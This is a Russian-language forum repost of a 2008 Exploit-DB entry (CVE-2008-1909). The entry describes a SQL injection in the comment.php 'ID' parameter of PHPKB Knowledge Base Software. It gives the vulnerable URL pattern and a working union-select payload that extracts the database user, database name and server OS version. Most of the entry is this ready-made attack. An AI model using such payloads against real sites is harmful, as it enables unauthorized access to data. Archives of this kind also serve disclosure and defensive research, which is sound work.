- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5428
- Проверка EDB
-
- Пройдено
- Автор
- PARAD0X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1909
- Дата публикации
- 2008-04-11
Код:
PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author : parad0x
# Home : www.inso.host.sk
# Script : PHPKB Knowledge Base Software
# Script Homepage : http://www.knowledgebase-script.com
-------------------------------------------------------------------------------------------------
http://[target]/comment.php?ID=[SQL]
-------------------------------------------------------------------------------------------------
Example:
http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
# milw0rm.com [2008-04-11]- Источник
- www.exploit-db.com
